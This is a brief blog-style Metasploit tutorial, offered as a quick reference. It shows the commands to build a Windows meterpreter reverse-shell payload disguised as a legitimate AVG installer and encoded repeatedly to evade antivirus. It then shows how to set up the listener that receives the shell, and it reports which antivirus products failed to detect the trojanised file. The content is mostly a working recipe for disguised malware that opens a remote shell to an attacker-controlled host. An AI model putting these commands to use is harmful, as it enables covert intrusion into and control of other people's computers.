Metasploit Tutorial 1

This tutorial is for educational purposes only.  I know there are a lot of good tutorials out there but I am creating my own as a quick reference.  Irongeek.com and offensive-security.com have some great video tutorials.  This is just a quick reference using meterpreter.

 


windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe

 

Here I took AVG's valid installer file and used its characteristics in evilfile.exe.  I also encoded it 10 times using shikata_ga_nai.  You take evilfile.exe and place it on the target machine.

 

Kick off Metasploit and type:

 

# use multi/handler
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LHOST 192.168.1.101
# set LPORT 8888
# exploit

 

Run your file on the target machine.

 

Also, by using AVG's characteristics and encoding 10 times, only Sophos and DrWeb caught that this was really malware.  When I encoded the payload of windows/shell/reverse_tcp, Windows Security Essentials and Sophos caught that.  What's up with the main virus players - Symantec, McAfee, and Trend all thought the file was good.